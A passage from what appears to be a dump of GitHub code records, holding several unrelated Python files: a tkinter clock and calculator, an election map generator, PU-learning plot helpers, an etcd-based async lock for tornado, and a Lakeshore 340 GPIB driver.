options.\"\"\"\n if itemid == \"mfile_quit\":\n self.quit()\n if itemid == \"mColour_foreground\":\n colours = askcolor(title=\"Choose colour of foreground\")\n self.foreground = colours[1]\n self.set_colours()\n if itemid == \"mColour_background\":\n colors = askcolor(title=\"Choose colour of background\")\n self.background = colors[1]\n self.set_colours()\n if itemid == \"mcolour_transparent\":\n self.set_colours()\n if itemid == \"mFonts_fonts\":\n self.show_font_dialog()\n if itemid == \"mhelp_license\":\n self.show_about_license()\n if itemid == \"mhelp_about\":\n self.show_about_dialog()\n\n def show_about_license(self):\n \"\"\"Call the about dialog.\"\"\"\n self.logger.info(f\" Running About Dialog \")\n self.myLicense.show_license_dialog()\n self.logger.info(f\" Closing About Dialog \")\n\n def show_about_dialog(self):\n \"\"\"Call the about dialog.\"\"\"\n self.logger.info(f\" Running About Dialog \")\n self.myAbout.show_about_dialog()\n self.logger.info(f\" Closing About Dialog \")\n\n def show_font_dialog(self):\n \"\"\"Call the font dialog.\"\"\"\n self.logger.info(f\" Running Font Dialog \")\n self.myFont.show_font_dialog()\n self.logger.info(f\" Closing Font Dialog \")\n\n def set_time_date(self):\n \"\"\"Update the screen, current time, date & idle time.\n\n TODO Stop guessing at length of idle time and try and use ttk measure function.\n \"\"\"\n\n strNow = datetime.datetime.now()\n\n # Set the time.\n var = self.builder.get_variable(\"current_time\")\n var.set(f\"{strNow:%H:%M:%S}\")\n\n # Set the date\n var = self.builder.get_variable(\"today_date\")\n var.set(f\"{ strNow:%A %d %B %Y}\")\n\n # Set the state\n var = self.builder.get_variable(\"current_state\")\n var.set(f\"{utils.get_state()}\")\n\n # Set the state\n idle = int(utils.get_idle_duration())\n if idle > 5: # Only print idles time if greater then 5 seconds.\n strIdle = f\"idle : {utils.formatSeconds(idle)}\"\n length = len(strIdle)\n strIdle = strIdle.rjust(58 - length, \" \") # Guess at 58 characters for right justification.\n else:\n strIdle = \"\"\n\n var = self.builder.get_variable(\"idle_time\") # This could change if the font is changed.\n var.set(f\"{strIdle}\")\n\n self.set_row()\n\n # Call the set_time_date() function every 1 second.\n self.mainwindow.after(1000, self.set_time_date)\n\n def 
set_row(self):\n \"\"\"Checks if a new font has been selected and sets accordingly.\n\n myFont is initially set to -1, set to -2 in the font chosen is not installed.\n \"\"\"\n if self.myFont.row == -1: # font not selected from menu.\n return\n if self.myFont.row == -2: # Selected font not installed.\n return\n if self.myFont.row != self.row1:\n self.row1 = self.myFont.row\n self.new_font, self.config.FONT_NAME, self.config.FONT_SIZE = fu.set_font(self.row1)\n self.lbl_current_time.configure(font=self.new_font)\n\n def set_check(self):\n \"\"\"Checks whether the transparency menu has been clicked.\"\"\"\n variable = self.builder.get_variable(\"mcolour_transparent_clicked\")\n variable.set(self.config.TRANSPARENT)\n\n def set_colours(self):\n \"\"\"Sets the foreground and background colour of the main window and all labels.\n Is called initially and from the menu when a colour chooser is selected.\n Also sets the transparency of all widgets.\n \"\"\"\n variable = self.builder.get_variable(\"mcolour_transparent_clicked\")\n self.transparent = variable.get()\n\n if self.transparent:\n trans_colour = \"grey\"\n self.config.TRANSPARENT = True\n else:\n trans_colour = self.background\n self.config.TRANSPARENT = False\n\n self.mainwindow.configure(background=trans_colour)\n self.mainmenu.configure(background=trans_colour, foreground=self.foreground)\n self.lbl_current_time.configure(\n background=trans_colour, foreground=self.foreground\n )\n self.lbl_today_date.configure(\n background=trans_colour, foreground=self.foreground\n )\n self.lbl_current_state.configure(\n background=trans_colour, foreground=self.foreground\n )\n self.lbl_idle_time.configure(\n background=trans_colour, foreground=self.foreground\n )\n\n # Used to move the app.\n # Binds start and sop to mouse left click and move to mouse move.\n def startMove(self, event):\n self.x = event.x\n self.y = event.y\n\n def stopMove(self, event):\n self.x = None\n self.y = None\n\n def moving(self, event):\n x = event.x_root - self.x\n y = event.y_root - self.y\n self.config.X_POS = x\n self.config.Y_POS = y\n self.mainwindow.geometry(\"+%s+%s\" % (x, y))\n\n def quit(self, event=None):\n \"\"\"Saves the current configuration and closes app.\n The font name and size has already been amened in the config class.\n self.config.TRANSPARENT also already set.\n \"\"\"\n try:\n self.config.FOREGROUND = self.foreground\n self.config.BACKGROUND = self.background\n self.config.writeConfig()\n except Exception as e:\n logger.debug(f\" Error occurred during saving of config: {e}\")\n\n self.mainwindow.quit()\n\n def run(self):\n \"\"\"Runs the main GUI loop.\"\"\"\n self.mainwindow.mainloop()\n\n\ndef main():\n \"\"\"Main function to run the thing.\"\"\"\n\n logger = Logger.get_logger(str(LOGGER_PATH)) # Create the logger.\n myConfig = Config.Config(CONFIG_PATH, logger) # Create the config.\n\n logger.info(\"-\" * 100)\n logger.info(f\" Running {myConfig.NAME} Version {myConfig.VERSION} \")\n logger.debug(f\" {platform.uname()}\")\n logger.debug(f\" Python Verion {platform.python_version()}\")\n logger.debug(\"\")\n logger.debug(f\" PROJECT_PATH :: {PROJECT_PATH}\")\n logger.debug(f\" MAIN_PATH :: {MAIN_PATH}\")\n logger.debug(f\" PROJECT_UI :: {PROJECT_UI}\")\n logger.debug(f\" RESOURCE_PATH:: {RESOURCE_PATH}\")\n logger.debug(f\" FONTS_PATH :: {FONTS_PATH}\")\n logger.debug(f\" CONFIG_PATH :: {CONFIG_PATH}\")\n logger.debug(f\" LOGGER_PATH :: {LOGGER_PATH}\")\n logger.debug(\"\")\n\n if getattr(sys, \"frozen\", False) and hasattr(sys, \"_MEIPASS\"):\n 
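# The TODO in set_time_date() above asks to replace the 58-character guess with
# a real text measurement. A hedged sketch using tkinter.font, which can measure
# a string's rendered pixel width; the target width and font family here are
# illustrative, not values from the application.
import tkinter as tk
from tkinter import font

def right_justified(text: str, total_px: int, fnt: font.Font) -> str:
    # pad with spaces until the rendered width reaches the target pixel width
    space_px = max(1, fnt.measure(" "))
    pad = max(0, (total_px - fnt.measure(text)) // space_px)
    return " " * pad + text

if __name__ == "__main__":
    root = tk.Tk()
    f = font.Font(family="Courier", size=10)
    print(repr(right_justified("idle : 00:01:23", 300, f)))
    root.destroy()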
logger.debug(\" Running in a PyInstaller bundle\")\n else:\n logger.debug(\" Running in a normal Python process\")\n\n app = FirstApp(myConfig, logger)\n app.run()\n\n logger.info(f\" Ending {myConfig.NAME} Version {myConfig.VERSION} \")\n logger.info(\"-\" * 100)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"keleven-uk/pyKlock","sub_path":"pyDigitalKlock_pygubu/src/pyDigitalKlock.py","file_name":"pyDigitalKlock.py","file_ext":"py","file_size_in_byte":10050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39935506457","text":"# -*- coding: utf-8 -*-\nimport os\nfrom knowledge.reader import data\n\n\nif __name__ == '__main__':\n BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n save_file = os.path.join(BASE_DIR, 'words/genre.txt')\n genre = []\n for dic in data.values():\n synonyms = list(dic.keys())[0].split(',')\n genre.extend(synonyms)\n\n with open(save_file, 'w') as f:\n f.write('\\n'.join(set(genre)))","repo_name":"Hironsan/HotPepperGourmetDialogue","sub_path":"training_data_generator/scripts/genre_maker.py","file_name":"genre_maker.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":275,"dataset":"github-code","pt":"21"} +{"seq_id":"28496499169","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 19 19:03:33 2018\n\n@author: Srikrishna.Sadula\n\"\"\"\n\nfrom pyspark import SparkConf, SparkContext\nconf = SparkConf().setMaster(\"local\").setAppName(\"My App\")\nsc = SparkContext(conf = conf)\n\nlines = sc.textFile(\"D:\\\\projects\\\\machinelearning\\\\mltutor\\\\spark\\\\src\\\\readme.txt\")\nlines.first()\npythonLines = lines.filter(lambda line: \"Python\" in line)\npythonLines.first()\n\nsc.stop()","repo_name":"krishxx/spark","sub_path":"src/spark2_7.py","file_name":"spark2_7.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43868566211","text":"# !/usr/bin/env python3\n# -*- coding:utf-8 -*-\n#\n# Author: Flyaway - flyaway1217@gmail.com\n# Blog: zhouyichu.com\n#\n# Python release: 3.4.5\n#\n# Date: 2017-02-21 10:29:21\n# Last modified: 2017-02-21 10:42:39\n\n\"\"\"\nCalculate the statistics information of the given data set.\n\"\"\"\n\n\ndef stat(path):\n with open(path, encoding='latin-1') as f:\n word_count = 0\n unique_words = set()\n sent_count = 0\n for line in f:\n if len(line.strip()) != 0:\n word_count += 1\n word = line.strip().split()[0]\n unique_words.add(word)\n else:\n sent_count += 1\n print('In the file {a}:\\n'.format(a=path))\n print('There are {a} sentences.'.format(a=sent_count))\n print('There are {a} words in total.'.format(a=word_count))\n print('There are {a} unique words.'.format(a=str(len(unique_words))))\n\nif __name__ == '__main__':\n # path = '../data/esp.train'\n # path = '../data/esp.testa'\n path = '../data/esp.testb'\n stat(path)\n","repo_name":"flyaway1217/CS-6390-Information-Extraction","sub_path":"ner/source/stat.py","file_name":"stat.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4553064809","text":"from tkinter import *\n\nif __name__ == \"__main__\":\n def add():\n s1 = int(num01.get())\n s2 = int(num02.get())\n\n result[\"text\"] = s1 + s2\n\n def sub():\n s1 = int(num01.get())\n s2 = int(num02.get())\n\n result[\"text\"] = s1 - s2\n\n def mul():\n s1 = int(num01.get())\n s2 
= int(num02.get())\n\n        result[\"text\"] = s1 * s2\n\n    def div():\n        s1 = int(num01.get())\n        s2 = int(num02.get())\n\n        result[\"text\"] = s1 / s2\n\n    calc = Tk()\n    calc.title(\"Calculator\")\n    calc.geometry(\"160x100\")\n\n    Label(calc, text=\"Number 1\").grid(row=0)\n    Label(calc, text=\"Number 2\").grid(row=1)\n    Label(calc, text=\"Result\").grid(row=2)\n\n    num01 = Entry(calc, width=20)\n    num01.grid(row=0, column=1)\n\n    num02 = Entry(calc, width=20)\n    num02.grid(row=1, column=1)\n\n    result = Label(calc, relief=\"raised\", width=17, bd=2, bg=\"green\")\n    result.grid(row=2, column=1)\n\n    Button(calc, text=\"+\", width=2, command=add).place(x=30, y=70)\n    Button(calc, text=\"-\", width=2, command=sub).place(x=60, y=70)\n    Button(calc, text=\"*\", width=2, command=mul).place(x=90, y=70)\n    Button(calc, text=\"/\", width=2, command=div).place(x=120, y=70)\n\n    calc.mainloop()\n","repo_name":"rivercity310/study","sub_path":"basic/linear_algebra/tkinter_ex4.py","file_name":"tkinter_ex4.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"18319293138","text":"from lib.read_excel import *\nfrom config.config import *\n\n\ndef get_data_list(sheet_name):\n    # the original three branches were identical apart from the local variable\n    # name, so they collapse into a single membership check\n    if sheet_name in (\"client_info\", \"login_user\", \"contact_info\"):\n        return excel_to_list(os.path.join(data_path, \"loan_info.xlsx\"), sheet_name)\n","repo_name":"restart759/Test_framework","sub_path":"object/baseuse/get_data_list.py","file_name":"get_data_list.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19944478071","text":"import pathlib\nimport sys\nimport pandas as pd\nfrom slugify import slugify\nimport numpy as np\nfrom map_basics import (\n    create_folium_choropleth,\n    load_json_file,\n    create_tool_tip,\n    read_csv_results,\n)\n\n\nVALGKRETS_DIR = pathlib.Path('valgkretser')\nVALGKRETS = 'krets-{}.geojson'\n\n\ndef _load_geojson_file(kommune_id):\n    \"\"\"Load data from a geojson file.\"\"\"\n    geojson_file = VALGKRETS_DIR.joinpath(\n        VALGKRETS.format(kommune_id)\n    )\n    return load_json_file(geojson_file)\n\n\ndef get_center(features):\n    \"\"\"Calculate the geometric center for some features.\"\"\"\n    averages = []\n    for feature in features:\n        for polygon in feature['geometry']['coordinates']:\n            coord = np.array(polygon)\n            averages.append(np.average(coord, axis=0))\n    averages = np.array(averages)\n    return np.average(averages, axis=0)\n\n\ndef extract_data(results, kommune_id, party):\n    \"\"\"Extract the required data.\"\"\"\n    kommune_data = results[results['Kommunenummer'] == kommune_id]\n    parti_data = kommune_data[kommune_data['Partinavn'] == party]\n    raw_data = {}\n    kretser = []\n    for _, row in parti_data.iterrows():\n        raw_data[row['Stemmekretsnummer']] = {\n            'krets': row['Stemmekretsnavn'],\n            'partinavn': row['Partinavn'],\n            'oppslutning': row['Oppslutning prosentvis'],\n            'kommunenavn': row['Kommunenavn'],\n        }\n        kretser.append(row['Stemmekretsnavn'])\n    all_same = len(kretser) == 1 and kretser[0] == 'Hele kommunen'\n    return raw_data, all_same\n\n\ndef get_geojson_data(result_file, party, kommune_id):\n    \"\"\"Read in result files and produce 
corresponding geojson data.\"\"\"\n results = read_csv_results(result_file)\n kommune_data = results[results['Kommunenummer'] == kommune_id]\n kommune_navn = kommune_data['Kommunenavn'].tolist()[0]\n print('Reading data for \"{}\" in \"{}\"'.format(party, kommune_navn))\n raw_data, all_same = extract_data(results, kommune_id, party)\n geojson_data = _load_geojson_file(kommune_id)\n # Check that we have data for all features:\n for feature in geojson_data['features']:\n if not all_same:\n krets = str(\n feature['properties']['valgkretsnummer']\n ).rjust(4, '0')\n else:\n krets = '0000'\n feature['properties']['oppslutning'] = '({:4.2f} %)'.format(\n raw_data[krets]['oppslutning']\n )\n feature['properties']['partinavn'] = raw_data[krets]['partinavn']\n feature['properties']['krets'] = krets\n map_settings = {\n 'title': kommune_navn,\n 'party': party,\n 'center': get_center(geojson_data['features'])[::-1],\n 'zoom': 10,\n 'value_key': 'oppslutning',\n 'tooltip': create_tool_tip(\n ('valgkretsnavn', 'partinavn', 'oppslutning'),\n ('Krets:', 'Parti', 'Oppslutning (%)'),\n labels=False,\n )\n }\n return geojson_data, raw_data, map_settings\n\n\ndef main(result_file, party, kommune_id):\n \"\"\"Read input file and create the map.\"\"\"\n geojson_data, results, map_settings = get_geojson_data(\n result_file, party, kommune_id\n )\n the_map = create_folium_choropleth(geojson_data, results, map_settings)\n\n out = 'stemmekrester-{}-kommune-{}-{}.html'.format(\n slugify(party), kommune_id, slugify(map_settings['title'])\n )\n print('Writing map to \"{}\"'.format(out))\n the_map.save(out)\n\n\nif __name__ == '__main__':\n main(sys.argv[1], sys.argv[2], sys.argv[3])\n","repo_name":"andersle/valg","sub_path":"kart_parti_i_kommune.py","file_name":"kart_parti_i_kommune.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10177190373","text":"import numpy as np\nimport pandas as pd\nimport plotly.express as px\nfrom sklearn.metrics import recall_score\n\nPOSITIVE_COLOR = \"#1E90FF\"\nNEGATIVE_COLOR = \"#FF6347\"\nLABELED_COLOR = \"#78B639\"\nUNLABELED_COLOR = \"#A9A9A9\"\n\n\ndef plot_x_y(xs: np.array, ys: np.array):\n df = pd.DataFrame.from_dict(\n {\n \"x_0\": xs[:, 0],\n \"x_1\": xs[:, 1],\n \"y\": [\"Positive\" if y == 1 else \"Negative\" for y in ys],\n }\n )\n return px.scatter(\n df,\n x=\"x_0\",\n y=\"x_1\",\n color=\"y\",\n color_discrete_map={\"Negative\": NEGATIVE_COLOR, \"Positive\": POSITIVE_COLOR},\n )\n\n\ndef plot_x_y_proba(xs: np.array, ys_prob: np.array):\n df = pd.DataFrame.from_dict(\n {\n \"x_0\": xs[:, 0],\n \"x_1\": xs[:, 1],\n \"y\": ys_prob,\n }\n )\n return px.scatter(\n df,\n x=\"x_0\",\n y=\"x_1\",\n color=\"y\",\n color_continuous_scale=[NEGATIVE_COLOR, POSITIVE_COLOR],\n range_color=[0.0, 1.0],\n )\n\n\ndef plot_x_y_list(xs: np.array, ys_list: list):\n df = pd.DataFrame(index=[], columns=[\"x_0\", \"x_1\", \"y\", \"clf_index\"])\n for i in range(len(ys_list)):\n df_ = pd.DataFrame.from_dict(\n {\n \"x_0\": xs[:, 0],\n \"x_1\": xs[:, 1],\n \"y\": [\"Positive\" if y == 1 else \"Negative\" for y in ys_list[i]],\n \"clf_index\": i,\n }\n )\n df = pd.concat([df, df_])\n return px.scatter(\n df,\n x=\"x_0\",\n y=\"x_1\",\n facet_row=\"clf_index\",\n color=\"y\",\n color_discrete_map={\"Negative\": NEGATIVE_COLOR, \"Positive\": POSITIVE_COLOR},\n )\n\n\ndef plot_x_s(xs: np.array, ss: np.array):\n df = pd.DataFrame.from_dict(\n {\n \"x_0\": xs[:, 0],\n \"x_1\": xs[:, 1],\n \"s\": 
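# The output filename in main() above leans on python-slugify to make party
# names filesystem-safe. Illustrative values (any party name or kommune id
# works the same way):
from slugify import slugify

print(slugify("Sosialistisk Venstreparti"))  # 'sosialistisk-venstreparti'
print('stemmekrester-{}-kommune-{}.html'.format(slugify("Arbeiderpartiet"), "0301"))
# -> 'stemmekrester-arbeiderpartiet-kommune-0301.html'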
[\"Positive\" if s == 1 else \"Unlabeled\" for s in ss],\n }\n )\n return px.scatter(\n df,\n x=\"x_0\",\n y=\"x_1\",\n color=\"s\",\n color_discrete_map={\"Unlabeled\": UNLABELED_COLOR, \"Positive\": LABELED_COLOR},\n )\n\n\ndef plot_x_s_proba(xs: np.array, ss_prob: np.array):\n df = pd.DataFrame.from_dict(\n {\n \"x_0\": xs[:, 0],\n \"x_1\": xs[:, 1],\n \"s\": ss_prob,\n }\n )\n return px.scatter(\n df,\n x=\"x_0\",\n y=\"x_1\",\n color=\"s\",\n color_continuous_scale=[UNLABELED_COLOR, LABELED_COLOR],\n range_color=[0.0, 1.0],\n )\n\n\ndef f1_prime(ys: np.array, ys_hat: np.array):\n r = recall_score(ys, ys_hat)\n ratio_p = len(ys_hat[ys_hat == 1]) / len(ys_hat)\n if ratio_p == 0.0:\n return 0.0\n else:\n return r**2 / ratio_p\n","repo_name":"hkiyomaru/pu-learning","sub_path":"notebooks/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"21"} +{"seq_id":"28081601635","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\netcd 异步 服务发现 异步 锁\n\"\"\"\nimport uuid\nfrom collections import namedtuple, defaultdict\nimport etcd\nimport threading\nimport logging\nfrom tornado.ioloop import IOLoop\nfrom tornado import gen\nfrom tornado.concurrent import Future\nfrom singleton import Singleton\n\n\nclass EtcdProcess(object):\n \"\"\"\"\n etcd 线程\n \"\"\"\n\n def __init__(self, watch_root, etcd_servers, sentry=None):\n \"\"\"\n init\n :param str watch_root: 监控的根目录\n :param tuple etcd_servers: etcd 服务器列表\n :param dict sentry: sentry object\n \"\"\"\n self.watch_root = watch_root\n self.client = etcd.Client(host=etcd_servers, allow_reconnect=True)\n self.sentry = sentry\n self._local_index = None\n self.key_process_dict = dict()\n self.thread = None\n\n def run(self):\n \"\"\"\n 循环阻塞获得etcd key的变化\n \"\"\"\n while True:\n try:\n response = self.client.watch(self.watch_root, recursive=True, timeout=0, index=self._local_index)\n self._local_index = response.modifiedIndex + 1\n\n etcd_key = response.key\n dir_list = etcd_key.split(\"/\")\n process_dir = dir_list[2]\n\n if self.key_process_dict.get(process_dir):\n response.dir_list = dir_list[3:]\n self.key_process_dict[process_dir](response)\n\n except Exception as exp:\n logging.error(\"tornado etcd thread error: %s\", str(exp))\n if self.sentry:\n self.sentry.captureException(exc_info=True)\n\n def _start_thread(self):\n \"\"\"\n 开启线程并确保线程可用\n :return:\n \"\"\"\n if not self.thread or not self.thread.is_alive():\n t = threading.Thread(target=self.run)\n self.thread = t\n t.setDaemon(True)\n t.start()\n logging.info(\"tornado etcd start thread\")\n\n def register(self, key, process):\n \"\"\"\n 注册处理器 eg: key=\"lock\" process=lock_process\n :param str key: 关注的目录\n :param func process: 处理器\n :return:\n \"\"\"\n if key in self.key_process_dict:\n raise RuntimeError(\"tornado etcd key: %s has existed\" % key)\n self.key_process_dict[key] = process\n\n\nclass ProcessBase(Singleton):\n \"\"\"\n 处理器基类\n \"\"\"\n\n def __init__(self, watch_root, etcd_servers, sentry=None):\n \"\"\"\n init\n :param key:\n :param etcd_servers:\n :param sentry:\n \"\"\"\n self.watch_root = watch_root\n self.etcd_process = EtcdProcess(watch_root, etcd_servers, sentry)\n self.client = etcd.Client(host=etcd_servers, allow_reconnect=True)\n self.watch_dict = defaultdict(list)\n self.etcd_process.register(self.base_key, self.process)\n\n def get_full_key(self, key):\n \"\"\"\n 获得带路径的key值 eg: key = \"read_lock\" return /base_dir/lock/read_lock\n :param str key: 
部分key值\n :return: \"获得带路径的key值\"\n \"\"\"\n dir_list = self.watch_root.split(\"/\")\n dir_list.extend([self.base_key, key])\n return \"/\".join(dir_list)\n\n def test_and_set(self, key, value, prev_value, ttl=None):\n \"\"\"\n etcd test_and_set 封装\n :param str key: 部分key值\n :param value: 设置的值\n :param prev_value: 设置前的值\n :param ttl: 过期时间\n :return:\n \"\"\"\n key = self.get_full_key(key)\n return self.client.test_and_set(key, value, prev_value, ttl)\n\n def set(self, key, value, ttl=None, dir=False, append=False, **kwdargs):\n \"\"\"\n etcd set 封装\n :param key: 部分key值\n :param value: 设置的值\n :param ttl: 过期时间\n :param dir: 目录\n :param append: \n :param kwdargs: \n :return: \n \"\"\"\n key = self.get_full_key(key)\n return self.client.write(key, value, ttl, dir, append, **kwdargs)\n\n def get(self, key, **kwdargs):\n \"\"\"\n etcd get 封装\n :param key: \n :param kwdargs: \n :return: \n \"\"\"\n key = self.get_full_key(key)\n return self.client.read(key, **kwdargs)\n\n def process(self, etcd_value):\n \"\"\"\n 处理器\n :param etcd_value:\n :return:\n \"\"\"\n raise NotImplementedError\n\n\nclass WatchProcess(ProcessBase):\n \"\"\"\n 监控关键字,关键字不变化,协程阻塞,关键字有变化,协程继续执行\n \"\"\"\n\n def __init__(self, watch_root, etcd_servers, sentry=None):\n \"\"\"\n init\n :param key: \n :param etcd_servers: \n :param sentry: \n \"\"\"\n self.base_key = \"watch\"\n super(WatchProcess, self).__init__(watch_root, etcd_servers, sentry)\n\n def watch_key(self, key):\n \"\"\"\n 监控关键字,关键字不变化,协程阻塞,关键字有变化,协程继续执行\n :param str key: 监控的关键字\n :return:\n \"\"\"\n self.etcd_process._start_thread()\n\n future = Future()\n self.watch_dict[key].append(future)\n return future\n\n def process(self, etcd_res):\n \"\"\"\n 监控关键字处理器\n :param etcd_res:\n :return:\n \"\"\"\n etcd_key = etcd_res.dir_list[0]\n etcd_value = etcd_res.value\n\n if etcd_key in self.watch_dict.keys():\n future_list = self.watch_dict[etcd_key]\n # 唤醒所有等待的watch\n for future in future_list:\n future.set_result((True, etcd_value))\n\n del self.watch_dict[etcd_key]\n\n\nclass EternalWatchProcess(ProcessBase):\n \"\"\"\n 监控关键字,关键字不变化,协程阻塞,关键字有变化,协程继续执行\n \"\"\"\n\n def __init__(self, watch_root, etcd_servers, sentry=None):\n \"\"\"\n init\n :param key:\n :param etcd_servers:\n :param sentry:\n \"\"\"\n self.base_key = \"eternal_watch\"\n super(EternalWatchProcess, self).__init__(watch_root, etcd_servers, sentry)\n\n def get_key(self, key):\n \"\"\"\n 监控关键字,关键字不变化,协程阻塞,关键字有变化,协程继续执行\n :param str key: 监控的关键字\n :return:\n \"\"\"\n self.etcd_process._start_thread()\n\n if not self.watch_dict.get(key):\n # etcd 中必须提前设置该key,否则报错\n etcd_res = self.get(key)\n self.watch_dict[key] = etcd_res.value\n\n return self.watch_dict[key]\n\n def process(self, etcd_res):\n \"\"\"\n 监控关键字处理器\n :param etcd_res:\n :return:\n \"\"\"\n etcd_key = etcd_res.dir_list[0]\n etcd_value = etcd_res.value\n\n if etcd_key in self.watch_dict.keys():\n # 更新值\n self.watch_dict[etcd_key] = etcd_value\n\n\nclass LockProcess(ProcessBase):\n \"\"\"\n 锁\n \"\"\"\n UNLOCK = \"no_lock\"\n Lock_Item = namedtuple(\"Lock_Item\", (\"future\", \"token\", \"ttl\"))\n\n def __init__(self, watch_root, etcd_servers, sentry=None):\n \"\"\"\n init\n :param key:\n :param etcd_servers:\n :param sentry:\n \"\"\"\n self.base_key = \"lock\"\n self.wait_lock_dict = defaultdict(list)\n self.locking_dict = dict()\n super(LockProcess, self).__init__(watch_root, etcd_servers, sentry)\n\n def process(self, etcd_res):\n \"\"\"\n 锁处理器\n :param etcd_res:\n :return:\n \"\"\"\n etcd_key = etcd_res.dir_list[0]\n etcd_value = 
etcd_res.value\n\n wait_lock_list = self.wait_lock_dict[etcd_key]\n\n # 解锁状态 或者 锁超时 进行解锁操作\n if etcd_value in (self.UNLOCK, None) and wait_lock_list:\n lock_item = wait_lock_list[0]\n lock_flag = self._lock(etcd_key, lock_item)\n\n if lock_flag:\n logging.info(\"tornado etcd lock sucess key:%s\", etcd_key)\n lock_item.future.set_result((True, lock_item.token))\n self.locking_dict[etcd_key] = lock_item\n self.wait_lock_dict[etcd_key].pop(0)\n\n # 锁超时\n elif not etcd_value:\n if self.locking_dict.get(etcd_key):\n ttl = self.locking_dict[etcd_key].ttl\n del self.locking_dict[etcd_key]\n raise RuntimeError(\"key: %s ttl: %s,lock time out\" % (etcd_key, ttl))\n\n def _lock(self, key, lock_item):\n \"\"\"\n 尝试加锁\n :param str key: 关键字\n :param str lock_uuid: lock码\n :return: bool 加锁是否成功\n \"\"\"\n token = lock_item.token\n ttl = lock_item.ttl\n try:\n self.test_and_set(key, token, self.UNLOCK, ttl)\n return True\n\n except etcd.EtcdKeyNotFound:\n try:\n self.set(key, token, prevExist=False, recursive=True, ttl=ttl)\n return True\n except etcd.EtcdAlreadyExist as e:\n logging.debug(e)\n return False\n\n except etcd.EtcdCompareFailed as e:\n logging.debug(e)\n return False\n\n def lock(self, key, ttl=None):\n \"\"\"\n 加锁\n :param str key: 关键字\n :param int ttl: 过期时间\n :return: Future object\n \"\"\"\n self.etcd_process._start_thread()\n future = Future()\n\n token = uuid.uuid4().hex\n lock_item = self.Lock_Item(future, token, ttl)\n lock_flag = self._lock(key, lock_item)\n if lock_flag:\n self.locking_dict[key] = lock_item\n future.set_result((True, token))\n else:\n self.wait_lock_dict[key].append(lock_item)\n return future\n\n def unlock(self, key, token):\n \"\"\"\n 解锁\n :param key:\n :return:\n \"\"\"\n try:\n self.test_and_set(key, self.UNLOCK, token)\n logging.info(\"tornado etcd unlock key: %s, token: %s\", key, token)\n return True\n except (etcd.EtcdCompareFailed, etcd.EtcdKeyNotFound) as e:\n logging.error(\"tornado etcd unlock before lock %s\", e)\n return False\n\n\nif __name__ == \"__main__\":\n ETCD_SERVERS = ((\"127.0.0.1\", 2379),)\n etcd_watch = LockProcess(\"/watch\", ETCD_SERVERS, None)\n\n\n def start_loop(function_list):\n \"\"\"\n 仅供脚本使用\n :param function_list:\n :return:\n \"\"\"\n io_loop = IOLoop.instance()\n future_list = []\n\n def stop(future):\n future_list.remove(future)\n if not future_list:\n io_loop.stop()\n\n for function in function_list:\n future = function()\n future_list.append(future)\n io_loop.add_future(future, lambda x: stop(x))\n\n io_loop.start()\n\n\n @gen.coroutine\n def test():\n # res = yield etcd_watch.get(\"/watch/a\")\n\n # res = yield etcd_watch.watch(\"/watch/aa\")\n\n # res = yield etcd_watch.get(\"/watch/aaa\")\n\n # a = \"hello\"\n # a += \"q\"\n import time\n start_time = time.time()\n flag, token = yield etcd_watch.lock(\"ba\")\n logging.error(token)\n\n def tmp():\n f = Future()\n IOLoop.current().call_later(1, lambda: f.set_result(None))\n return f\n\n yield tmp()\n res = etcd_watch.unlock(\"ba\", token)\n logging.error(\"执行时间:\")\n logging.error(time.time() - start_time)\n raise gen.Return(res)\n\n\n start_loop([test, test, test, test, test, test, test, test, test, test, test, test, ])\n # IOLoop.current().run_sync(test)\n # def main():\n # IOLoop.current().run_sync(test)\n #\n #\n # from multiprocessing import Process\n #\n # for _ in range(2):\n # p = Process(target=main)\n # p.daemon = False\n # 
p.start()\n","repo_name":"h094071/utils","sub_path":"etcd_lib/tornado_etcd.py","file_name":"tornado_etcd.py","file_ext":"py","file_size_in_byte":12064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8341383654","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSet of functions to control Lakeshore 340 temperature controller.\n\nPython 3.7\n\n@author: Carlos galdino\ngaldino@ifi.unicamp.br\n\"\"\"\n\nimport KUSB_488A_communication as gpib\n\n\nclass Lakeshore_340():\n \"\"\"Lakeshore 340 temperature controller.\"\"\"\n\n def __init__(self, address):\n self.address = address\n\n # Configure Control Loop Parameters\n gpib.send('\\\"CSET 1 A 1 on\\\"', self.address)\n self.input = 'A'\n self.controlLoop = '1'\n\n\n def heater_range(self, *args):\n \"\"\"Set and get heater range\n\n heater_range() >> Query Heater Range.\n heater_range(0-5) >> Configure Heater Range (from 0 to 5).\n\n :params range: heater range.\n\n :Return: the heater range.\n \"\"\"\n # if len(args)==1:\n # gpib.send('\\\"Range ' + str(args[0]) + '\\\"', self.address)\n # else:\n # gpib.send('RANGE?', self.address)\n # return float(gpib.receive(self.address))\n if len(args)==1:\n gpib.send('\\\"RANGE ' + str(args[0]) + '\\\"', self.address)\n else:\n gpib.send('RANGE?', self.address)\n try:\n return float(gpib.receive(self.address))\n except ValueError:\n print('ERROR: Communication lost.')\n\n\n def heater_output(self):\n \"\"\"Get Heater Output (0 to 100%).\n\n :Return: heater output in percent.\n \"\"\"\n # gpib.send('HTR?', self.address)\n # return float(gpib.receive(self.address))\n if 